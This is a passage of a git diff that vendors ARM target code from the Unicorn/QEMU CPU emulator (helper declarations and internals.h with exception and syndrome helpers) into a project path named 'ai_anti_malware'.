f32, ptr) +DEF_HELPER_FLAGS_2(rintd_exact, TCG_CALL_NO_RWG, f64, f64, ptr) +DEF_HELPER_FLAGS_2(rints, TCG_CALL_NO_RWG, f32, f32, ptr) +DEF_HELPER_FLAGS_2(rintd, TCG_CALL_NO_RWG, f64, f64, ptr) + +/* neon_helper.c */ +DEF_HELPER_FLAGS_3(neon_qadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_s8, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_qadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s8, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_uqadd_s64, TCG_CALL_NO_RWG, i64, env, i64, i64) +DEF_HELPER_FLAGS_3(neon_sqadd_u8, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_sqadd_u16, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_sqadd_u32, TCG_CALL_NO_RWG, i32, env, i32, i32) +DEF_HELPER_FLAGS_3(neon_sqadd_u64, TCG_CALL_NO_RWG, i64, env, i64, i64) +DEF_HELPER_3(neon_qsub_u8, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_u16, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_u32, i32, env, i32, i32) +DEF_HELPER_3(neon_qsub_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qadd_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qadd_s64, i64, env, i64, i64) +DEF_HELPER_3(neon_qsub_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qsub_s64, i64, env, i64, i64) + +DEF_HELPER_2(neon_hadd_s8, i32, i32, i32) +DEF_HELPER_2(neon_hadd_u8, i32, i32, i32) +DEF_HELPER_2(neon_hadd_s16, i32, i32, i32) +DEF_HELPER_2(neon_hadd_u16, i32, i32, i32) +DEF_HELPER_2(neon_hadd_s32, s32, s32, s32) +DEF_HELPER_2(neon_hadd_u32, i32, i32, i32) 
+DEF_HELPER_2(neon_rhadd_s8, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_u8, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_s16, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_u16, i32, i32, i32) +DEF_HELPER_2(neon_rhadd_s32, s32, s32, s32) +DEF_HELPER_2(neon_rhadd_u32, i32, i32, i32) +DEF_HELPER_2(neon_hsub_s8, i32, i32, i32) +DEF_HELPER_2(neon_hsub_u8, i32, i32, i32) +DEF_HELPER_2(neon_hsub_s16, i32, i32, i32) +DEF_HELPER_2(neon_hsub_u16, i32, i32, i32) +DEF_HELPER_2(neon_hsub_s32, s32, s32, s32) +DEF_HELPER_2(neon_hsub_u32, i32, i32, i32) + +DEF_HELPER_2(neon_cgt_u8, i32, i32, i32) +DEF_HELPER_2(neon_cgt_s8, i32, i32, i32) +DEF_HELPER_2(neon_cgt_u16, i32, i32, i32) +DEF_HELPER_2(neon_cgt_s16, i32, i32, i32) +DEF_HELPER_2(neon_cgt_u32, i32, i32, i32) +DEF_HELPER_2(neon_cgt_s32, i32, i32, i32) +DEF_HELPER_2(neon_cge_u8, i32, i32, i32) +DEF_HELPER_2(neon_cge_s8, i32, i32, i32) +DEF_HELPER_2(neon_cge_u16, i32, i32, i32) +DEF_HELPER_2(neon_cge_s16, i32, i32, i32) +DEF_HELPER_2(neon_cge_u32, i32, i32, i32) +DEF_HELPER_2(neon_cge_s32, i32, i32, i32) + +DEF_HELPER_2(neon_min_u8, i32, i32, i32) +DEF_HELPER_2(neon_min_s8, i32, i32, i32) +DEF_HELPER_2(neon_min_u16, i32, i32, i32) +DEF_HELPER_2(neon_min_s16, i32, i32, i32) +DEF_HELPER_2(neon_min_u32, i32, i32, i32) +DEF_HELPER_2(neon_min_s32, i32, i32, i32) +DEF_HELPER_2(neon_max_u8, i32, i32, i32) +DEF_HELPER_2(neon_max_s8, i32, i32, i32) +DEF_HELPER_2(neon_max_u16, i32, i32, i32) +DEF_HELPER_2(neon_max_s16, i32, i32, i32) +DEF_HELPER_2(neon_max_u32, i32, i32, i32) +DEF_HELPER_2(neon_max_s32, i32, i32, i32) +DEF_HELPER_2(neon_pmin_u8, i32, i32, i32) +DEF_HELPER_2(neon_pmin_s8, i32, i32, i32) +DEF_HELPER_2(neon_pmin_u16, i32, i32, i32) +DEF_HELPER_2(neon_pmin_s16, i32, i32, i32) +DEF_HELPER_2(neon_pmax_u8, i32, i32, i32) +DEF_HELPER_2(neon_pmax_s8, i32, i32, i32) +DEF_HELPER_2(neon_pmax_u16, i32, i32, i32) +DEF_HELPER_2(neon_pmax_s16, i32, i32, i32) + +DEF_HELPER_2(neon_abd_u8, i32, i32, i32) +DEF_HELPER_2(neon_abd_s8, i32, i32, i32) 
+DEF_HELPER_2(neon_abd_u16, i32, i32, i32) +DEF_HELPER_2(neon_abd_s16, i32, i32, i32) +DEF_HELPER_2(neon_abd_u32, i32, i32, i32) +DEF_HELPER_2(neon_abd_s32, i32, i32, i32) + +DEF_HELPER_2(neon_shl_u8, i32, i32, i32) +DEF_HELPER_2(neon_shl_s8, i32, i32, i32) +DEF_HELPER_2(neon_shl_u16, i32, i32, i32) +DEF_HELPER_2(neon_shl_s16, i32, i32, i32) +DEF_HELPER_2(neon_shl_u32, i32, i32, i32) +DEF_HELPER_2(neon_shl_s32, i32, i32, i32) +DEF_HELPER_2(neon_shl_u64, i64, i64, i64) +DEF_HELPER_2(neon_shl_s64, i64, i64, i64) +DEF_HELPER_2(neon_rshl_u8, i32, i32, i32) +DEF_HELPER_2(neon_rshl_s8, i32, i32, i32) +DEF_HELPER_2(neon_rshl_u16, i32, i32, i32) +DEF_HELPER_2(neon_rshl_s16, i32, i32, i32) +DEF_HELPER_2(neon_rshl_u32, i32, i32, i32) +DEF_HELPER_2(neon_rshl_s32, i32, i32, i32) +DEF_HELPER_2(neon_rshl_u64, i64, i64, i64) +DEF_HELPER_2(neon_rshl_s64, i64, i64, i64) +DEF_HELPER_3(neon_qshl_u8, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_u16, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_u32, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qshl_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qshl_s64, i64, env, i64, i64) +DEF_HELPER_3(neon_qshlu_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qshlu_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qshlu_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qshlu_s64, i64, env, i64, i64) +DEF_HELPER_3(neon_qrshl_u8, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_s8, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_u16, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_u32, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qrshl_u64, i64, env, i64, i64) +DEF_HELPER_3(neon_qrshl_s64, i64, env, i64, i64) + +DEF_HELPER_2(neon_add_u8, i32, i32, i32) +DEF_HELPER_2(neon_add_u16, i32, i32, i32) +DEF_HELPER_2(neon_padd_u8, i32, i32, i32) 
+DEF_HELPER_2(neon_padd_u16, i32, i32, i32) +DEF_HELPER_2(neon_sub_u8, i32, i32, i32) +DEF_HELPER_2(neon_sub_u16, i32, i32, i32) +DEF_HELPER_2(neon_mul_u8, i32, i32, i32) +DEF_HELPER_2(neon_mul_u16, i32, i32, i32) +DEF_HELPER_2(neon_mul_p8, i32, i32, i32) +DEF_HELPER_2(neon_mull_p8, i64, i32, i32) + +DEF_HELPER_2(neon_tst_u8, i32, i32, i32) +DEF_HELPER_2(neon_tst_u16, i32, i32, i32) +DEF_HELPER_2(neon_tst_u32, i32, i32, i32) +DEF_HELPER_2(neon_ceq_u8, i32, i32, i32) +DEF_HELPER_2(neon_ceq_u16, i32, i32, i32) +DEF_HELPER_2(neon_ceq_u32, i32, i32, i32) + +DEF_HELPER_1(neon_abs_s8, i32, i32) +DEF_HELPER_1(neon_abs_s16, i32, i32) +DEF_HELPER_1(neon_clz_u8, i32, i32) +DEF_HELPER_1(neon_clz_u16, i32, i32) +DEF_HELPER_1(neon_cls_s8, i32, i32) +DEF_HELPER_1(neon_cls_s16, i32, i32) +DEF_HELPER_1(neon_cls_s32, i32, i32) +DEF_HELPER_1(neon_cnt_u8, i32, i32) +DEF_HELPER_FLAGS_1(neon_rbit_u8, TCG_CALL_NO_RWG_SE, i32, i32) + +DEF_HELPER_3(neon_qdmulh_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qrdmulh_s16, i32, env, i32, i32) +DEF_HELPER_3(neon_qdmulh_s32, i32, env, i32, i32) +DEF_HELPER_3(neon_qrdmulh_s32, i32, env, i32, i32) + +DEF_HELPER_1(neon_narrow_u8, i32, i64) +DEF_HELPER_1(neon_narrow_u16, i32, i64) +DEF_HELPER_2(neon_unarrow_sat8, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_u8, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_s8, i32, env, i64) +DEF_HELPER_2(neon_unarrow_sat16, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_u16, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_s16, i32, env, i64) +DEF_HELPER_2(neon_unarrow_sat32, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_u32, i32, env, i64) +DEF_HELPER_2(neon_narrow_sat_s32, i32, env, i64) +DEF_HELPER_1(neon_narrow_high_u8, i32, i64) +DEF_HELPER_1(neon_narrow_high_u16, i32, i64) +DEF_HELPER_1(neon_narrow_round_high_u8, i32, i64) +DEF_HELPER_1(neon_narrow_round_high_u16, i32, i64) +DEF_HELPER_1(neon_widen_u8, i64, i32) +DEF_HELPER_1(neon_widen_s8, i64, i32) +DEF_HELPER_1(neon_widen_u16, i64, i32) +DEF_HELPER_1(neon_widen_s16, 
i64, i32) + +DEF_HELPER_2(neon_addl_u16, i64, i64, i64) +DEF_HELPER_2(neon_addl_u32, i64, i64, i64) +DEF_HELPER_2(neon_paddl_u16, i64, i64, i64) +DEF_HELPER_2(neon_paddl_u32, i64, i64, i64) +DEF_HELPER_2(neon_subl_u16, i64, i64, i64) +DEF_HELPER_2(neon_subl_u32, i64, i64, i64) +DEF_HELPER_3(neon_addl_saturate_s32, i64, env, i64, i64) +DEF_HELPER_3(neon_addl_saturate_s64, i64, env, i64, i64) +DEF_HELPER_2(neon_abdl_u16, i64, i32, i32) +DEF_HELPER_2(neon_abdl_s16, i64, i32, i32) +DEF_HELPER_2(neon_abdl_u32, i64, i32, i32) +DEF_HELPER_2(neon_abdl_s32, i64, i32, i32) +DEF_HELPER_2(neon_abdl_u64, i64, i32, i32) +DEF_HELPER_2(neon_abdl_s64, i64, i32, i32) +DEF_HELPER_2(neon_mull_u8, i64, i32, i32) +DEF_HELPER_2(neon_mull_s8, i64, i32, i32) +DEF_HELPER_2(neon_mull_u16, i64, i32, i32) +DEF_HELPER_2(neon_mull_s16, i64, i32, i32) + +DEF_HELPER_1(neon_negl_u16, i64, i64) +DEF_HELPER_1(neon_negl_u32, i64, i64) + +DEF_HELPER_FLAGS_2(neon_qabs_s8, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qabs_s16, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qabs_s32, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qabs_s64, TCG_CALL_NO_RWG, i64, env, i64) +DEF_HELPER_FLAGS_2(neon_qneg_s8, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qneg_s16, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qneg_s32, TCG_CALL_NO_RWG, i32, env, i32) +DEF_HELPER_FLAGS_2(neon_qneg_s64, TCG_CALL_NO_RWG, i64, env, i64) + +DEF_HELPER_3(neon_abd_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_ceq_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_cge_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_cgt_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_acge_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_acgt_f32, i32, i32, i32, ptr) +DEF_HELPER_3(neon_acge_f64, i64, i64, i64, ptr) +DEF_HELPER_3(neon_acgt_f64, i64, i64, i64, ptr) + +/* iwmmxt_helper.c */ +DEF_HELPER_2(iwmmxt_maddsq, i64, i64, i64) +DEF_HELPER_2(iwmmxt_madduq, i64, i64, i64) +DEF_HELPER_2(iwmmxt_sadb, i64, i64, i64) 
+DEF_HELPER_2(iwmmxt_sadw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_mulslw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_mulshw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_mululw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_muluhw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_macsw, i64, i64, i64) +DEF_HELPER_2(iwmmxt_macuw, i64, i64, i64) +DEF_HELPER_1(iwmmxt_setpsr_nz, i32, i64) + +#define DEF_IWMMXT_HELPER_SIZE_ENV(name) \ +DEF_HELPER_3(iwmmxt_##name##b, i64, env, i64, i64) \ +DEF_HELPER_3(iwmmxt_##name##w, i64, env, i64, i64) \ +DEF_HELPER_3(iwmmxt_##name##l, i64, env, i64, i64) \ + +DEF_IWMMXT_HELPER_SIZE_ENV(unpackl) +DEF_IWMMXT_HELPER_SIZE_ENV(unpackh) + +DEF_HELPER_2(iwmmxt_unpacklub, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackluw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklul, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhub, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhuw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhul, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklsb, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklsw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpacklsl, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhsb, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhsw, i64, env, i64) +DEF_HELPER_2(iwmmxt_unpackhsl, i64, env, i64) + +DEF_IWMMXT_HELPER_SIZE_ENV(cmpeq) +DEF_IWMMXT_HELPER_SIZE_ENV(cmpgtu) +DEF_IWMMXT_HELPER_SIZE_ENV(cmpgts) + +DEF_IWMMXT_HELPER_SIZE_ENV(mins) +DEF_IWMMXT_HELPER_SIZE_ENV(minu) +DEF_IWMMXT_HELPER_SIZE_ENV(maxs) +DEF_IWMMXT_HELPER_SIZE_ENV(maxu) + +DEF_IWMMXT_HELPER_SIZE_ENV(subn) +DEF_IWMMXT_HELPER_SIZE_ENV(addn) +DEF_IWMMXT_HELPER_SIZE_ENV(subu) +DEF_IWMMXT_HELPER_SIZE_ENV(addu) +DEF_IWMMXT_HELPER_SIZE_ENV(subs) +DEF_IWMMXT_HELPER_SIZE_ENV(adds) + +DEF_HELPER_3(iwmmxt_avgb0, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_avgb1, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_avgw0, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_avgw1, i64, env, i64, i64) + +DEF_HELPER_3(iwmmxt_align, i64, i64, i64, i32) +DEF_HELPER_4(iwmmxt_insr, i64, i64, i32, i32, i32) + +DEF_HELPER_1(iwmmxt_bcstb, i64, i32) 
+DEF_HELPER_1(iwmmxt_bcstw, i64, i32) +DEF_HELPER_1(iwmmxt_bcstl, i64, i32) + +DEF_HELPER_1(iwmmxt_addcb, i64, i64) +DEF_HELPER_1(iwmmxt_addcw, i64, i64) +DEF_HELPER_1(iwmmxt_addcl, i64, i64) + +DEF_HELPER_1(iwmmxt_msbb, i32, i64) +DEF_HELPER_1(iwmmxt_msbw, i32, i64) +DEF_HELPER_1(iwmmxt_msbl, i32, i64) + +DEF_HELPER_3(iwmmxt_srlw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_srll, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_srlq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sllw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_slll, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sllq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sraw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sral, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_sraq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_rorw, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_rorl, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_rorq, i64, env, i64, i32) +DEF_HELPER_3(iwmmxt_shufh, i64, env, i64, i32) + +DEF_HELPER_3(iwmmxt_packuw, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packul, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packuq, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packsw, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packsl, i64, env, i64, i64) +DEF_HELPER_3(iwmmxt_packsq, i64, env, i64, i64) + +DEF_HELPER_3(iwmmxt_muladdsl, i64, i64, i32, i32) +DEF_HELPER_3(iwmmxt_muladdsw, i64, i64, i32, i32) +DEF_HELPER_3(iwmmxt_muladdswl, i64, i64, i32, i32) + +DEF_HELPER_3(neon_unzip8, void, env, i32, i32) +DEF_HELPER_3(neon_unzip16, void, env, i32, i32) +DEF_HELPER_3(neon_qunzip8, void, env, i32, i32) +DEF_HELPER_3(neon_qunzip16, void, env, i32, i32) +DEF_HELPER_3(neon_qunzip32, void, env, i32, i32) +DEF_HELPER_3(neon_zip8, void, env, i32, i32) +DEF_HELPER_3(neon_zip16, void, env, i32, i32) +DEF_HELPER_3(neon_qzip8, void, env, i32, i32) +DEF_HELPER_3(neon_qzip16, void, env, i32, i32) +DEF_HELPER_3(neon_qzip32, void, env, i32, i32) + +DEF_HELPER_4(crypto_aese, void, env, i32, i32, i32) +DEF_HELPER_4(crypto_aesmc, void, env, i32, i32, i32) + +DEF_HELPER_5(crypto_sha1_3reg, 
void, env, i32, i32, i32, i32) +DEF_HELPER_3(crypto_sha1h, void, env, i32, i32) +DEF_HELPER_3(crypto_sha1su1, void, env, i32, i32) + +DEF_HELPER_4(crypto_sha256h, void, env, i32, i32, i32) +DEF_HELPER_4(crypto_sha256h2, void, env, i32, i32, i32) +DEF_HELPER_3(crypto_sha256su0, void, env, i32, i32) +DEF_HELPER_4(crypto_sha256su1, void, env, i32, i32, i32) + +DEF_HELPER_FLAGS_3(crc32_arm, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) +DEF_HELPER_FLAGS_3(crc32c, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32) +DEF_HELPER_2(dc_zva, void, env, i64) + +DEF_HELPER_FLAGS_2(neon_pmull_64_lo, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(neon_pmull_64_hi, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +#ifdef TARGET_ARM +#define helper_clz helper_clz_arm +#define gen_helper_clz gen_helper_clz_arm +#define helper_crc32 helper_crc32_arm +#define gen_helper_crc32 gen_helper_crc32_arm +#endif + +#ifdef TARGET_AARCH64 +#include "helper-a64.h" +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/internals.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/internals.h new file mode 100644 index 0000000..c1ad757 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-arm/internals.h @@ -0,0 +1,383 @@ +/* + * QEMU ARM CPU -- internal functions and types + * + * Copyright (c) 2014 Linaro Ltd + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * <http://www.gnu.org/licenses/>. + * + * This header defines functions, types, etc which need to be shared + * between different source files within target-arm/ but which are + * private to it and not required by the rest of QEMU. + */ + +#ifndef TARGET_ARM_INTERNALS_H +#define TARGET_ARM_INTERNALS_H + +static inline bool excp_is_internal(int excp) +{ + /* Return true if this exception number represents a QEMU-internal + * exception that will not be passed to the guest. + */ + return excp == EXCP_INTERRUPT + || excp == EXCP_HLT + || excp == EXCP_DEBUG + || excp == EXCP_HALTED + || excp == EXCP_EXCEPTION_EXIT + || excp == EXCP_KERNEL_TRAP + || excp == EXCP_STREX; +} + +/* Exception names for debug logging; note that not all of these + * precisely correspond to architectural exceptions. + */ +static const char * const excnames[] = { + NULL, + "Undefined Instruction", + "SVC", + "Prefetch Abort", + "Data Abort", + "IRQ", + "FIQ", + "Breakpoint", + "QEMU v7M exception exit", + "QEMU intercept of kernel commpage", + "QEMU intercept of STREX", + "Hypervisor Call", + "Hypervisor Trap", + "Secure Monitor Call", + "Virtual IRQ", + "Virtual FIQ", +}; + +static inline void arm_log_exception(int idx) +{ + if (qemu_loglevel_mask(CPU_LOG_INT)) { + const char *exc = NULL; + + if (idx >= 0 && idx < ARRAY_SIZE(excnames)) { + exc = excnames[idx]; + } + if (!exc) { + exc = "unknown"; + } + qemu_log_mask(CPU_LOG_INT, "Taking exception %d [%s]\n", idx, exc); + } +} + +/* Scale factor for generic timers, ie number of ns per tick. + * This gives a 62.5MHz timer. + */ +#define GTIMER_SCALE 16 + +/* + * For AArch64, map a given EL to an index in the banked_spsr array. + */ +static inline unsigned int aarch64_banked_spsr_index(unsigned int el) +{ + static const unsigned int map[4] = { + 0, + 0, /* EL1. */ + 6, /* EL2. */ + 7, /* EL3.
*/ + }; + assert(el >= 1 && el <= 3); + return map[el]; +} + +int bank_number(int mode); +void switch_mode(CPUARMState *, int); +void arm_cpu_register_gdb_regs_for_features(ARMCPU *cpu); +void arm_translate_init(struct uc_struct *uc); + +enum arm_fprounding { + FPROUNDING_TIEEVEN, + FPROUNDING_POSINF, + FPROUNDING_NEGINF, + FPROUNDING_ZERO, + FPROUNDING_TIEAWAY, + FPROUNDING_ODD +}; + +int arm_rmode_to_sf(int rmode); + +static inline void aarch64_save_sp(CPUARMState *env, int el) +{ + if (env->pstate & PSTATE_SP) { + env->sp_el[el] = env->xregs[31]; + } else { + env->sp_el[0] = env->xregs[31]; + } +} + +static inline void aarch64_restore_sp(CPUARMState *env, int el) +{ + if (env->pstate & PSTATE_SP) { + env->xregs[31] = env->sp_el[el]; + } else { + env->xregs[31] = env->sp_el[0]; + } +} + +static inline void update_spsel(CPUARMState *env, uint32_t imm) +{ + unsigned int cur_el = arm_current_el(env); + /* Update PSTATE SPSel bit; this requires us to update the + * working stack pointer in xregs[31]. + */ + if (!((imm ^ env->pstate) & PSTATE_SP)) { + return; + } + aarch64_save_sp(env, cur_el); + env->pstate = deposit32(env->pstate, 0, 1, imm); + + /* We rely on illegal updates to SPsel from EL0 to get trapped + * at translation time. + */ + assert(cur_el >= 1 && cur_el <= 3); + aarch64_restore_sp(env, cur_el); +} + +/* Return true if extended addresses are enabled. + * This is always the case if our translation regime is 64 bit, + * but depends on TTBCR.EAE for 32 bit. 
+ */ +static inline bool extended_addresses_enabled(CPUARMState *env) +{ + return arm_el_is_aa64(env, 1) + || ((arm_feature(env, ARM_FEATURE_LPAE) + && (env->cp15.c2_control & TTBCR_EAE))); +} + +/* Valid Syndrome Register EC field values */ +enum arm_exception_class { + EC_UNCATEGORIZED = 0x00, + EC_WFX_TRAP = 0x01, + EC_CP15RTTRAP = 0x03, + EC_CP15RRTTRAP = 0x04, + EC_CP14RTTRAP = 0x05, + EC_CP14DTTRAP = 0x06, + EC_ADVSIMDFPACCESSTRAP = 0x07, + EC_FPIDTRAP = 0x08, + EC_CP14RRTTRAP = 0x0c, + EC_ILLEGALSTATE = 0x0e, + EC_AA32_SVC = 0x11, + EC_AA32_HVC = 0x12, + EC_AA32_SMC = 0x13, + EC_AA64_SVC = 0x15, + EC_AA64_HVC = 0x16, + EC_AA64_SMC = 0x17, + EC_SYSTEMREGISTERTRAP = 0x18, + EC_INSNABORT = 0x20, + EC_INSNABORT_SAME_EL = 0x21, + EC_PCALIGNMENT = 0x22, + EC_DATAABORT = 0x24, + EC_DATAABORT_SAME_EL = 0x25, + EC_SPALIGNMENT = 0x26, + EC_AA32_FPTRAP = 0x28, + EC_AA64_FPTRAP = 0x2c, + EC_SERROR = 0x2f, + EC_BREAKPOINT = 0x30, + EC_BREAKPOINT_SAME_EL = 0x31, + EC_SOFTWARESTEP = 0x32, + EC_SOFTWARESTEP_SAME_EL = 0x33, + EC_WATCHPOINT = 0x34, + EC_WATCHPOINT_SAME_EL = 0x35, + EC_AA32_BKPT = 0x38, + EC_VECTORCATCH = 0x3a, + EC_AA64_BKPT = 0x3c, +}; + +#define ARM_EL_EC_SHIFT 26 +#define ARM_EL_IL_SHIFT 25 +#define ARM_EL_IL (1 << ARM_EL_IL_SHIFT) + +/* Utility functions for constructing various kinds of syndrome value. + * Note that in general we follow the AArch64 syndrome values; in a + * few cases the value in HSR for exceptions taken to AArch32 Hyp + * mode differs slightly, so if we ever implemented Hyp mode then the + * syndrome value would need some massaging on exception entry. + * (One example of this is that AArch64 defaults to IL bit set for + * exceptions which don't specifically indicate information about the + * trapping instruction, whereas AArch32 defaults to IL bit clear.) 
+ */ +static inline uint32_t syn_uncategorized(void) +{ + return (EC_UNCATEGORIZED << ARM_EL_EC_SHIFT) | ARM_EL_IL; +} + +static inline uint32_t syn_aa64_svc(uint32_t imm16) +{ + return (EC_AA64_SVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa64_hvc(uint32_t imm16) +{ + return (EC_AA64_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa64_smc(uint32_t imm16) +{ + return (EC_AA64_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa32_svc(uint32_t imm16, bool is_thumb) +{ + return (EC_AA32_SVC << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) + | (is_thumb ? 0 : ARM_EL_IL); +} + +static inline uint32_t syn_aa32_hvc(uint32_t imm16) +{ + return (EC_AA32_HVC << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa32_smc(void) +{ + return (EC_AA32_SMC << ARM_EL_EC_SHIFT) | ARM_EL_IL; +} + +static inline uint32_t syn_aa64_bkpt(uint32_t imm16) +{ + return (((unsigned int)EC_AA64_BKPT) << ARM_EL_EC_SHIFT) | ARM_EL_IL | (imm16 & 0xffff); +} + +static inline uint32_t syn_aa32_bkpt(uint32_t imm16, bool is_thumb) +{ + return (((unsigned int)EC_AA32_BKPT) << ARM_EL_EC_SHIFT) | (imm16 & 0xffff) + | (is_thumb ? 0 : ARM_EL_IL); +} + +static inline uint32_t syn_aa64_sysregtrap(int op0, int op1, int op2, + int crn, int crm, int rt, + int isread) +{ + return (EC_SYSTEMREGISTERTRAP << ARM_EL_EC_SHIFT) | ARM_EL_IL + | (op0 << 20) | (op2 << 17) | (op1 << 14) | (crn << 10) | (rt << 5) + | (crm << 1) | isread; +} + +static inline uint32_t syn_cp14_rt_trap(int cv, int cond, int opc1, int opc2, + int crn, int crm, int rt, int isread, + bool is_thumb) +{ + return (EC_CP14RTTRAP << ARM_EL_EC_SHIFT) + | (is_thumb ? 
